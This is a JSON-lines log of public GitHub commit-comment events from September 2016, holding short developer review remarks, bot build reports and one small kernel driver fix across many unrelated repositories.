{"id":"4510204270","type":"CommitCommentEvent","actor":{"login":"diraol"},"repo":{"name":"kytos/python-openflow"},"payload":{"comment":{"id":18885170,"position":18,"line":16,"path":"pyof/v0x02/common/header.py","commit_id":"1634da3868961c14d57062ee8c207bdbcc70148f","created_at":"2016-09-02T19:06:55Z","updated_at":"2016-09-02T19:06:55Z","body":"Just to provide a follow up.\r\nI've talked to @raphaelmcobe and we think that there is no simple/easy way to reimplement the metastruct class to consider this cases.\r\nSo, let's go with the [*kiss*](https://pt.wikipedia.org/wiki/Keep_It_Simple) method and do a full new implementation of the class that has any changes, without inheritances."}},"created_at":"2016-09-02T19:06:55Z"}
{"id":"4510204724","type":"CommitCommentEvent","actor":{"login":"julius-t"},"repo":{"name":"julius-t/julius-t.github.io"},"payload":{"comment":{"id":18885173,"position":null,"line":null,"path":null,"commit_id":"cd7111e879b8fb5f9a6af539d5992d084ac4a1d4","created_at":"2016-09-02T19:07:01Z","updated_at":"2016-09-02T19:07:01Z","body":"main"}},"created_at":"2016-09-02T19:07:01Z"}
{"id":"4510209765","type":"CommitCommentEvent","actor":{"login":"Sentient07"},"repo":{"name":"nouiz/Theano"},"payload":{"comment":{"id":18885190,"position":5,"line":158,"path":"theano/compile/mode.py","commit_id":"a63459b5004d25164004c25aa1620e0974e8ecb0","created_at":"2016-09-02T19:08:09Z","updated_at":"2016-09-02T19:08:09Z","body":"What does this do ? I never knew about this param :(\r\n"}},"created_at":"2016-09-02T19:08:09Z"}
{"id":"4510210870","type":"CommitCommentEvent","actor":{"login":"Sentient07"},"repo":{"name":"nouiz/Theano"},"payload":{"comment":{"id":18885191,"position":5,"line":158,"path":"theano/compile/mode.py","commit_id":"a63459b5004d25164004c25aa1620e0974e8ecb0","created_at":"2016-09-02T19:08:23Z","updated_at":"2016-09-02T19:08:23Z","body":"Oh, seems like you've added it "}},"created_at":"2016-09-02T19:08:23Z"}
{"id":"4510211459","type":"CommitCommentEvent","actor":{"login":"timbiedert"},"repo":{"name":"ospray/OSPRay"},"payload":{"comment":{"id":18885192,"position":null,"line":null,"path":null,"commit_id":"91107dea6d6795d269623213d59d9cefd9c08aa4","created_at":"2016-09-02T19:08:31Z","updated_at":"2016-09-02T19:08:31Z","body":"camera/Camera.ispc seems to be missing"}},"created_at":"2016-09-02T19:08:31Z"}
{"id":"4510214238","type":"CommitCommentEvent","actor":{"login":"tallforasmurf"},"repo":{"name":"dickreuter/pyinstaller"},"payload":{"comment":{"id":18885203,"position":null,"line":null,"path":null,"commit_id":"ac59aa66ef29c31897c2e5d15c11d22ba06c8953","created_at":"2016-09-02T19:09:11Z","updated_at":"2016-09-02T19:09:11Z","body":"If the original was working, I guess ok. I'm a little puzzled because, in the Qt distribution folder there is a `.framework/Resource` folder for every component, e.g. `QtGui.framework/Resources`, `QtWidgets.framework/Resources` , `QtWebEngineWidgets.framework/Resources` etc etc. What's special about QtGui that it has to be called out (and e.g. QtCore.framework/Resources is not)."}},"created_at":"2016-09-02T19:09:11Z"}
{"id":"4510219726","type":"CommitCommentEvent","actor":{"login":"pliablepixels"},"repo":{"name":"pliablepixels/zmNinja"},"payload":{"comment":{"id":18885216,"position":null,"line":null,"path":null,"commit_id":"8135cb34b138d394de53d159a04615208170e24f","created_at":"2016-09-02T19:10:25Z","updated_at":"2016-09-02T19:10:25Z","body":"#317 "}},"created_at":"2016-09-02T19:10:25Z"}
{"id":"4510220753","type":"CommitCommentEvent","actor":{"login":"pliablepixels"},"repo":{"name":"pliablepixels/zmNinja"},"payload":{"comment":{"id":18885217,"position":null,"line":null,"path":null,"commit_id":"e9ffcb70582e414f7391ea305d5f499386685f32","created_at":"2016-09-02T19:10:39Z","updated_at":"2016-09-02T19:10:39Z","body":"#317 "}},"created_at":"2016-09-02T19:10:39Z"}
{"id":"4510224374","type":"CommitCommentEvent","actor":{"login":"rtlanceroad"},"repo":{"name":"rtlanceroad/gentoo-ebuilds"},"payload":{"comment":{"id":18885227,"position":null,"line":null,"path":null,"commit_id":"e2551e7349010c5f35c78c4450dc9a3c5ca724fe","created_at":"2016-09-02T19:11:28Z","updated_at":"2016-09-02T19:11:28Z","body":"Actually It works on gentoo(~amd64). I'll fix it on funtoo side."}},"created_at":"2016-09-02T19:11:28Z"}
{"id":"4510228714","type":"CommitCommentEvent","actor":{"login":"schmidtk"},"repo":{"name":"openlayers/ol3"},"payload":{"comment":{"id":18885235,"position":55,"line":144,"path":"src/ol/renderer/canvas/canvasvectortilelayerrenderer.js","commit_id":"c1b16217f28f50d4585a2ffda603b83042cbd2cc","created_at":"2016-09-02T19:12:27Z","updated_at":"2016-09-02T19:12:27Z","body":"@ahocevar - `this.renderedTiles` is declared as `Array<ol.Tile>`, causing a compiler error when checkTypes is enabled. This class should use generics, an override, or a `@type {ol.VectorTile}` cast to instruct the compiler of the correct type."}},"created_at":"2016-09-02T19:12:27Z"}
{"id":"4510233115","type":"CommitCommentEvent","actor":{"login":"3F"},"repo":{"name":"3F/vsSolutionBuildEvent"},"payload":{"comment":{"id":18885248,"position":null,"line":null,"path":null,"commit_id":"e3724d7e4b5721059ab93f39c579644172989f06","created_at":"2016-09-02T19:13:27Z","updated_at":"2016-09-02T19:13:27Z","body":"I meant *prepared list of EnvDTE projects, i.e.: \r\n\r\n* +subprojects, project.Kind filters, ...\r\n"}},"created_at":"2016-09-02T19:13:27Z"}
{"id":"4510233794","type":"CommitCommentEvent","actor":{"login":"Juststeens"},"repo":{"name":"Juststeens/juststeens.github.io"},"payload":{"comment":{"id":18885251,"position":null,"line":null,"path":null,"commit_id":"0bb9efd6eb0068f758c4d38c05594c4548f3d9c4","created_at":"2016-09-02T19:13:36Z","updated_at":"2016-09-02T19:13:36Z","body":"@bontgoy Here's the PR, just wanted to tag you on it."}},"created_at":"2016-09-02T19:13:36Z"}
{"id":"4510237050","type":"CommitCommentEvent","actor":{"login":"Bontgoy"},"repo":{"name":"Juststeens/juststeens.github.io"},"payload":{"comment":{"id":18885259,"position":null,"line":null,"path":null,"commit_id":"0bb9efd6eb0068f758c4d38c05594c4548f3d9c4","created_at":"2016-09-02T19:14:22Z","updated_at":"2016-09-02T19:14:22Z","body":"Thanks @Juststeens \r\n\r\nMake sure to wait for feedback on PRs you tag me in before merging them."}},"created_at":"2016-09-02T19:14:22Z"}
{"id":"4510237827","type":"CommitCommentEvent","actor":{"login":"tcz001"},"repo":{"name":"twtiger/gosecco"},"payload":{"comment":{"id":18885262,"position":null,"line":null,"path":null,"commit_id":"86f7e4be3da746bcda1e8eae6e102e35d598e623","created_at":"2016-09-02T19:14:33Z","updated_at":"2016-09-02T19:14:33Z","body":"hm...weird  :/"}},"created_at":"2016-09-02T19:14:33Z"}
{"id":"4510241941","type":"CommitCommentEvent","actor":{"login":"RJxMoDz"},"repo":{"name":"RJxMoDz/VCA-v9"},"payload":{"comment":{"id":18885275,"position":null,"line":null,"path":null,"commit_id":"b9158ed9c986058d38dd30cec0b46420d9c04828","created_at":"2016-09-02T19:15:33Z","updated_at":"2016-09-02T19:15:33Z","body":"Fake."}},"created_at":"2016-09-02T19:15:33Z"}
{"id":"4510242214","type":"CommitCommentEvent","actor":{"login":"lrudolph1"},"repo":{"name":"lrudolph1/GenericRPG"},"payload":{"comment":{"id":18885276,"position":null,"line":null,"path":null,"commit_id":"ee722ff50fced4af0d2eca942313130938ed75f2","created_at":"2016-09-02T19:15:37Z","updated_at":"2016-09-02T19:15:37Z","body":"This does not contain data serialization yet"}},"created_at":"2016-09-02T19:15:37Z"}
{"id":"4510242718","type":"CommitCommentEvent","actor":{"login":"RJxMoDz"},"repo":{"name":"RJxMoDz/VCA-v9"},"payload":{"comment":{"id":18885279,"position":null,"line":null,"path":null,"commit_id":"b9158ed9c986058d38dd30cec0b46420d9c04828","created_at":"2016-09-02T19:15:45Z","updated_at":"2016-09-02T19:15:45Z","body":"For virus."}},"created_at":"2016-09-02T19:15:45Z"}
{"id":"4510242899","type":"CommitCommentEvent","actor":{"login":"scgm11"},"repo":{"name":"electron/electron.atom.io"},"payload":{"comment":{"id":18885282,"position":null,"line":null,"path":null,"commit_id":"829d28e9cdd410b2e486fd9fc45dc82a2944c733","created_at":"2016-09-02T19:15:47Z","updated_at":"2016-09-02T19:15:47Z","body":"sorry I missed that comma!, how can I have this commited again? Thanks!"}},"created_at":"2016-09-02T19:15:47Z"}
{"id":"4510243046","type":"CommitCommentEvent","actor":{"login":"nickvido"},"repo":{"name":"svidovich/introcompsci_lab_1"},"payload":{"comment":{"id":18885283,"position":26,"line":26,"path":"e1_1.cpp","commit_id":"8a1627315688c0f52b3312ac97758722fdd2497b","created_at":"2016-09-02T19:15:49Z","updated_at":"2016-09-02T19:15:49Z","body":"Yeah, this is a lot of code repetition... \r\nYou might lookup the atoi function (you'll want to make sure they didn't give you more than one character -- or: what result does atoi give if it is a whole string instead of one character?)"}},"created_at":"2016-09-02T19:15:49Z"}
{"id":"4510252243","type":"CommitCommentEvent","actor":{"login":"nickvido"},"repo":{"name":"svidovich/introcompsci_lab_1"},"payload":{"comment":{"id":18885301,"position":26,"line":26,"path":"e1_1.cpp","commit_id":"8a1627315688c0f52b3312ac97758722fdd2497b","created_at":"2016-09-02T19:17:56Z","updated_at":"2016-09-02T19:17:56Z","body":"If you look up the ascii table, you'll see that the letters are contiguous... can you convert the input letter to a value so you can just compare and see what range it is in?"}},"created_at":"2016-09-02T19:17:56Z"}
{"id":"4510252599","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"jd4564/Pokemon-Showdown"},"payload":{"comment":{"id":18885302,"position":null,"line":null,"path":null,"commit_id":"c68aff18c7cc320b7992086a5c4054f9db83d8a9","created_at":"2016-09-02T19:18:02Z","updated_at":"2016-09-02T19:18:02Z","body":"This commit crashes Mix and Mega."}},"created_at":"2016-09-02T19:18:02Z"}
{"id":"4510261402","type":"CommitCommentEvent","actor":{"login":"ANierbeck"},"repo":{"name":"ops4j/org.ops4j.pax.web"},"payload":{"comment":{"id":18885335,"position":null,"line":null,"path":null,"commit_id":"72b90afc54c4b6840e41e8eeac23fb0a5562f453","created_at":"2016-09-02T19:20:09Z","updated_at":"2016-09-02T19:20:09Z","body":"Those changes require a API Version Bump to 4.3.0 ... I'm quite OK with that, but we need to be more sensitive with those changes. "}},"created_at":"2016-09-02T19:20:09Z"}
{"id":"4510261755","type":"CommitCommentEvent","actor":{"login":"emilsvennesson"},"repo":{"name":"emilsvennesson/kodi-espnplayer"},"payload":{"comment":{"id":18885336,"position":null,"line":null,"path":null,"commit_id":"74a57e18f48a4987b87626b90372a5148b8faed6","created_at":"2016-09-02T19:20:14Z","updated_at":"2016-09-02T19:20:14Z","body":"@aqw Do you recognize some of the code? :grin:"}},"created_at":"2016-09-02T19:20:14Z"}
{"id":"4510264593","type":"CommitCommentEvent","actor":{"login":"samtai1229"},"repo":{"name":"samtai1229/hello-world"},"payload":{"comment":{"id":18885340,"position":3,"line":3,"path":"README.md","commit_id":"24ab5d6e417aad576983a863ba1e743bde39922e","created_at":"2016-09-02T19:20:51Z","updated_at":"2016-09-02T19:20:51Z","body":"not bad"}},"created_at":"2016-09-02T19:20:51Z"}
{"id":"4510264609","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"jd4564/Pokemon-Showdown"},"payload":{"comment":{"id":18885341,"position":8,"line":73,"path":"mods/mixandmega/scripts.js","commit_id":"c68aff18c7cc320b7992086a5c4054f9db83d8a9","created_at":"2016-09-02T19:20:51Z","updated_at":"2016-09-02T19:20:51Z","body":"specifically, this line"}},"created_at":"2016-09-02T19:20:51Z"}
{"id":"4510267165","type":"CommitCommentEvent","actor":{"login":"dirk"},"repo":{"name":"Everlane/sprockets-coffee-react"},"payload":{"comment":{"id":18885350,"position":null,"line":null,"path":null,"commit_id":"7d95d71f5cfbb1834c68d019c01905a10095dfaf","created_at":"2016-09-02T19:21:28Z","updated_at":"2016-09-02T19:21:28Z","body":"@raelgc: We've switched over to [Webpack](https://webpack.github.io/) and are pretty happy with it!"}},"created_at":"2016-09-02T19:21:28Z"}
{"id":"4510268724","type":"CommitCommentEvent","actor":{"login":"leonydus"},"repo":{"name":"lrudolph1/GenericRPG"},"payload":{"comment":{"id":18885354,"position":null,"line":null,"path":null,"commit_id":"6d87f90e3229ae3aa05e8d3e3570789ea67f1065","created_at":"2016-09-02T19:21:52Z","updated_at":"2016-09-02T19:21:52Z","body":"No serialization yet."}},"created_at":"2016-09-02T19:21:52Z"}
{"id":"4510270852","type":"CommitCommentEvent","actor":{"login":"diakopter"},"repo":{"name":"leanprover/lean.js"},"payload":{"comment":{"id":18885358,"position":null,"line":null,"path":null,"commit_id":"df04e1dc4b58c5ea00bff6e7fc58df7ae12f1377","created_at":"2016-09-02T19:22:22Z","updated_at":"2016-09-02T19:22:22Z","body":"(bump)"}},"created_at":"2016-09-02T19:22:22Z"}
{"id":"4510272622","type":"CommitCommentEvent","actor":{"login":"wysohn"},"repo":{"name":"DRE2N/DungeonsXL"},"payload":{"comment":{"id":18885366,"position":null,"line":null,"path":null,"commit_id":"f1de40ef2f7ffeb910aa7ba340b28bf0694a51a8","created_at":"2016-09-02T19:22:47Z","updated_at":"2016-09-02T19:22:47Z","body":"that's true, but if we reload\r\n\r\nhttps://jd.bukkit.org/org/bukkit/plugin/PluginManager.html#addPermission(org.bukkit.permissions.Permission)\r\n\r\nthis guy will complain about the duplicating permission that is already registered\r\n\r\nif that's already fixed then great!"}},"created_at":"2016-09-02T19:22:47Z"}
{"id":"4510280686","type":"CommitCommentEvent","actor":{"login":"wusiv"},"repo":{"name":"wusiv/PoolWaterControl"},"payload":{"comment":{"id":18885383,"position":264,"line":270,"path":"PumpRX/PumpRX.ino","commit_id":"8288ea5f2c6d1497eacad8876740aeb18e2ecd19","created_at":"2016-09-02T19:24:45Z","updated_at":"2016-09-02T19:24:45Z","body":"aa"}},"created_at":"2016-09-02T19:24:45Z"}
{"id":"4510281106","type":"CommitCommentEvent","actor":{"login":"shawnwahi"},"repo":{"name":"PureNexusProject/android_build"},"payload":{"comment":{"id":18885384,"position":null,"line":null,"path":null,"commit_id":"1f620c48b5bb24b3c9a031c9b0e8bf8e6c1f4d2b","created_at":"2016-09-02T19:24:52Z","updated_at":"2016-09-02T19:24:52Z","body":"I think you mean \"depreciated\" not \"deprecated\" lol"}},"created_at":"2016-09-02T19:24:52Z"}
{"id":"4510283120","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18885387,"position":null,"line":null,"path":null,"commit_id":"9d858276c1ef029fbc96dcbb401a0f10755016d4","created_at":"2016-09-02T19:25:21Z","updated_at":"2016-09-02T19:25:21Z","body":"Good luck at LTC. This will improve many evaluations."}},"created_at":"2016-09-02T19:25:21Z"}
{"id":"4510284221","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18885389,"position":null,"line":null,"path":null,"commit_id":"811ba74ff6b19cfc8101a201b86a29e1e564f064","created_at":"2016-09-02T19:25:37Z","updated_at":"2016-09-02T19:25:37Z","body":"113835831-Source-Temp-Not-Reporting (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2366 of 2367 tests passed, 24 test warnings)\n\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 4 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-811ba74ff6b19cfc8101a201b86a29e1e564f064-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-811ba74ff6b19cfc8101a201b86a29e1e564f064-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T19:25:37Z"}
{"id":"4510286794","type":"CommitCommentEvent","actor":{"login":"raoulvdberge"},"repo":{"name":"raoulvdberge/refinedstorage"},"payload":{"comment":{"id":18885398,"position":null,"line":null,"path":null,"commit_id":"85856a4eebc2e9ebc8014593acaa795c0eea8e8f","created_at":"2016-09-02T19:26:15Z","updated_at":"2016-09-02T19:26:15Z","body":"No problem ;-)"}},"created_at":"2016-09-02T19:26:15Z"}
{"id":"4510287187","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18885401,"position":null,"line":null,"path":null,"commit_id":"f483a3c5a9b7110aa681e35019b38d1f4fdacdf6","created_at":"2016-09-02T19:26:21Z","updated_at":"2016-09-02T19:26:21Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 912](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12462&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-02T19:26:21Z"}
{"id":"4510288147","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18885405,"position":null,"line":null,"path":null,"commit_id":"811ba74ff6b19cfc8101a201b86a29e1e564f064","created_at":"2016-09-02T19:26:35Z","updated_at":"2016-09-02T19:26:35Z","body":"113835831-Source-Temp-Not-Reporting (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-811ba74ff6b19cfc8101a201b86a29e1e564f064-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-02T19:26:35Z"}
{"id":"4510290001","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"alesaiko/kernel_msm"},"payload":{"comment":{"id":18885414,"position":null,"line":null,"path":null,"commit_id":"8b468160010cd8d104770cc9037e2ea108870937","created_at":"2016-09-02T19:27:05Z","updated_at":"2016-09-02T19:27:05Z","body":"Hey I've a gift for ya.  When viewing sound control enabled param in terminal or file manager (I'm lazy), the value returned was the literal count(28 for the record).  The workaround I used was setting it to 1 explicitly in my ramdisk init script, but this is a real fix for the driver without need for such measures:\n\nstatic ssize_t sound_control_enabled_store(struct kobject *kobj,\n\t\tstruct kobj_attribute *attr, const char *buf, size_t count)\n{\n\tsscanf(buf, \"%d\", &snd_ctrl_enabled);\n \n\tif (snd_ctrl_enabled >= 1)\n\t\tsnd_ctrl_enabled = 1;\n\telse if (snd_ctrl_enabled <= 0)\n\t\tsnd_ctrl_enabled = 0;\n \n\treturn count;\n}"}},"created_at":"2016-09-02T19:27:05Z"}
{"id":"4510290556","type":"CommitCommentEvent","actor":{"login":"jeffamstutz"},"repo":{"name":"ospray/OSPRay"},"payload":{"comment":{"id":18885417,"position":null,"line":null,"path":null,"commit_id":"91107dea6d6795d269623213d59d9cefd9c08aa4","created_at":"2016-09-02T19:27:13Z","updated_at":"2016-09-02T19:27:13Z","body":"Thanks for the quick reply, I've reverted the commit for the time being. \r\n\r\n@johguenther can you have a look?"}},"created_at":"2016-09-02T19:27:13Z"}
{"id":"4510291525","type":"CommitCommentEvent","actor":{"login":"Ahrovan"},"repo":{"name":"mavlink/mavlink"},"payload":{"comment":{"id":18885422,"position":null,"line":null,"path":null,"commit_id":"8201e5fa8d7e9389720499630601ba8e4468204d","created_at":"2016-09-02T19:27:25Z","updated_at":"2016-09-02T19:27:25Z","body":"Hi\r\nWhy here pixhawk.xml removed? can explain that or link for more info \r\nthx"}},"created_at":"2016-09-02T19:27:25Z"}
{"id":"4510291626","type":"CommitCommentEvent","actor":{"login":"Bloodskull"},"repo":{"name":"SkullAndBone/Cryptage-fr"},"payload":{"comment":{"id":18885425,"position":null,"line":null,"path":null,"commit_id":"51a6036fca546c90e040711e69f21135067806a6","created_at":"2016-09-02T19:27:26Z","updated_at":"2016-09-02T19:27:26Z","body":"Pour ça il faut s'amuser à essayer d'écrire avec les caractères, c'est long mais me semble qu'il y a des sites qui font ça"}},"created_at":"2016-09-02T19:27:26Z"}
{"id":"4510301805","type":"CommitCommentEvent","actor":{"login":"discipolat"},"repo":{"name":"SkullAndBone/Cryptage-fr"},"payload":{"comment":{"id":18885448,"position":null,"line":null,"path":null,"commit_id":"51a6036fca546c90e040711e69f21135067806a6","created_at":"2016-09-02T19:29:38Z","updated_at":"2016-09-02T19:29:38Z","body":"Ok\nLe 2 sept. 2016 20:27, \"Bloodskull\" <notifications@github.com> a écrit :\n\n> Pour ça il faut s'amuser à essayer d'écrire avec les caractères, c'est\n> long mais me semble qu'il y a des sites qui font ça\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/SkullAndBone/Cryptage-fr/commit/51a6036fca546c90e040711e69f21135067806a6#commitcomment-18885425>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIhyA4yDD8rXpgV5lqBNQ6znQRvJDUztks5qmHiegaJpZM4JEsQ_>\n> .\n>\n"}},"created_at":"2016-09-02T19:29:38Z"}
{"id":"4510304208","type":"CommitCommentEvent","actor":{"login":"voros-goebbels"},"repo":{"name":"voros-goebbels/XWX"},"payload":{"comment":{"id":18885456,"position":null,"line":null,"path":null,"commit_id":"be0c1d16f01560c4d0449e1d30ebf18570d6321c","created_at":"2016-09-02T19:30:13Z","updated_at":"2016-09-02T19:30:13Z","body":"\r\n\r\n[dany11122000.zip](https://github.com/voros-goebbels/XWX/files/452771/dany11122000.zip)\r\n"}},"created_at":"2016-09-02T19:30:13Z"}
{"id":"4510304303","type":"CommitCommentEvent","actor":{"login":"jlord"},"repo":{"name":"electron/electron.atom.io"},"payload":{"comment":{"id":18885457,"position":null,"line":null,"path":null,"commit_id":"829d28e9cdd410b2e486fd9fc45dc82a2944c733","created_at":"2016-09-02T19:30:14Z","updated_at":"2016-09-02T19:30:14Z","body":"@scgm11 I left a comment here: https://github.com/electron/electron.atom.io/pull/456#issuecomment-244431419"}},"created_at":"2016-09-02T19:30:14Z"}
{"id":"4510305325","type":"CommitCommentEvent","actor":{"login":"voros-goebbels"},"repo":{"name":"voros-goebbels/XWX"},"payload":{"comment":{"id":18885460,"position":null,"line":null,"path":null,"commit_id":"be0c1d16f01560c4d0449e1d30ebf18570d6321c","created_at":"2016-09-02T19:30:26Z","updated_at":"2016-09-02T19:30:26Z","body":"#**EYES ONLY**"}},"created_at":"2016-09-02T19:30:26Z"}
{"id":"4510311513","type":"CommitCommentEvent","actor":{"login":"nouiz"},"repo":{"name":"Theano/Theano"},"payload":{"comment":{"id":18885472,"position":240,"line":2006,"path":"theano/gpuarray/dnn.py","commit_id":"ca7d962b6072b5029d2918da875972a9698d4364","created_at":"2016-09-02T19:31:51Z","updated_at":"2016-09-02T19:31:51Z","body":"rm. I'll stop my review as this is there. The code is probably not ready for review."}},"created_at":"2016-09-02T19:31:51Z"}
{"id":"4510312223","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"flar2/ElementalX-N5"},"payload":{"comment":{"id":18885476,"position":null,"line":null,"path":null,"commit_id":"337e894cf0da50d099a2ab6add9f5256a3e7d398","created_at":"2016-09-02T19:32:02Z","updated_at":"2016-09-02T19:32:02Z","body":"Hey I've a gift for ya.  When viewing sound control enabled param in terminal or file manager (I'm lazy), the value returned was the literal count(28 for the record).  The workaround I used was setting it to 1 explicitly in my ramdisk init script, but this is a real fix for the driver without need for such measures:\n\nstatic ssize_t sound_control_enabled_store(struct kobject *kobj,\n\t\tstruct kobj_attribute *attr, const char *buf, size_t count)\n{\n\tsscanf(buf, \"%d\", &snd_ctrl_enabled);\n \n\tif (snd_ctrl_enabled >= 1)\n\t\tsnd_ctrl_enabled = 1;\n\telse if (snd_ctrl_enabled <= 0)\n\t\tsnd_ctrl_enabled = 0;\n \n\treturn count;\n}"}},"created_at":"2016-09-02T19:32:02Z"}
{"id":"4510312648","type":"CommitCommentEvent","actor":{"login":"Muqsit"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18885478,"position":null,"line":null,"path":null,"commit_id":"1703b005e4e1abff86c28e13504d91b20616a2fd","created_at":"2016-09-02T19:32:09Z","updated_at":"2016-09-02T19:32:09Z","body":"2000th commit, GG!"}},"created_at":"2016-09-02T19:32:09Z"}
{"id":"4510314969","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18885489,"position":null,"line":null,"path":null,"commit_id":"d794efad94f5589d7ddaba73330e4cf0e0c60118","created_at":"2016-09-02T19:32:42Z","updated_at":"2016-09-02T19:32:42Z","body":"Can you provide a link to the test case that makes sure this does not repeat?"}},"created_at":"2016-09-02T19:32:42Z"}
{"id":"4510318488","type":"CommitCommentEvent","actor":{"login":"jrah"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18885499,"position":23,"line":81,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T19:33:33Z","updated_at":"2016-09-02T19:33:33Z","body":"I am thinking that I might might some errors in the future when keeping consistent heading hierarchy with the correct `fs{#}`.\r\n\r\nIf a `h1` has `fs2`, could `h3` or `h2` have `fs2` too?"}},"created_at":"2016-09-02T19:33:33Z"}
{"id":"4510321345","type":"CommitCommentEvent","actor":{"login":"linjan"},"repo":{"name":"inputstick/InputStickAPI-Android"},"payload":{"comment":{"id":18885504,"position":null,"line":null,"path":null,"commit_id":"c83e2df38b1c26130167eebb81b4f019df9474d8","created_at":"2016-09-02T19:34:13Z","updated_at":"2016-09-02T19:34:13Z","body":"a lot of thx, its much easier to use now :+1: "}},"created_at":"2016-09-02T19:34:13Z"}
{"id":"4510325193","type":"CommitCommentEvent","actor":{"login":"Hermanya"},"repo":{"name":"Hermanya/listenable-browser"},"payload":{"comment":{"id":18885512,"position":8,"line":35,"path":"support_for_this_browser.js","commit_id":"c343679059b3123d91c0b6f266bb4dfe96385976","created_at":"2016-09-02T19:35:09Z","updated_at":"2016-09-02T19:35:09Z","body":"@alinz do tell why you think it's gonna leak memory"}},"created_at":"2016-09-02T19:35:09Z"}
{"id":"4510327215","type":"CommitCommentEvent","actor":{"login":"cybe"},"repo":{"name":"tg123/sshpiper"},"payload":{"comment":{"id":18885520,"position":29,"line":85,"path":"sshpiperd/config.go","commit_id":"d6bc70821005af8eece45666612560732fdd5e90","created_at":"2016-09-02T19:35:37Z","updated_at":"2016-09-02T19:35:37Z","body":"Minor typo here that results in the cmd arg being `---server_key`."}},"created_at":"2016-09-02T19:35:37Z"}
{"id":"4510328253","type":"CommitCommentEvent","actor":{"login":"dupont-y"},"repo":{"name":"ceph/ceph"},"payload":{"comment":{"id":18885527,"position":4,"line":228,"path":".organizationmap","commit_id":"9ff3292b932124fc1d418c456d21338cc6df8ba2","created_at":"2016-09-02T19:35:51Z","updated_at":"2016-09-02T19:35:51Z","body":"\n\nLe 02/09/16 à 03:31, Chengwei Yang a écrit :\n>\n> oops, it did merged, iQiyi is fine.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/ceph/ceph/commit/9ff3292b932124fc1d418c456d21338cc6df8ba2#commitcomment-18873441>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AGvyZshe1V9McATk1jlkeWUiJ9BPVhrlks5ql3x-gaJpZM4JzRwe>.\n>\nHi,\nno the pull request it's not merged right now, (will be in 1 week or \nmaybe more) so I still can change this ;\n\nThe change is reflected here :\nhttps://github.com/ceph/ceph/pull/10955/commits/969469635d6551f7bb9635f61eaec39066928d71\n\nBy The way, is <contact@iqiyi.com> the best contact adress ?\n\nCheers,\n"}},"created_at":"2016-09-02T19:35:51Z"}
{"id":"4510332265","type":"CommitCommentEvent","actor":{"login":"wildKahoona"},"repo":{"name":"wildKahoona/TicketSystem1"},"payload":{"comment":{"id":18885535,"position":null,"line":null,"path":null,"commit_id":"2155d4a15deced4ba41456ef3bc35a636627b861","created_at":"2016-09-02T19:36:50Z","updated_at":"2016-09-02T19:36:50Z","body":"wo bist du?"}},"created_at":"2016-09-02T19:36:50Z"}
{"id":"4510332556","type":"CommitCommentEvent","actor":{"login":"tg123"},"repo":{"name":"tg123/sshpiper"},"payload":{"comment":{"id":18885537,"position":29,"line":85,"path":"sshpiperd/config.go","commit_id":"d6bc70821005af8eece45666612560732fdd5e90","created_at":"2016-09-02T19:36:56Z","updated_at":"2016-09-02T19:36:56Z","body":"thanks\r\n👍 "}},"created_at":"2016-09-02T19:36:56Z"}
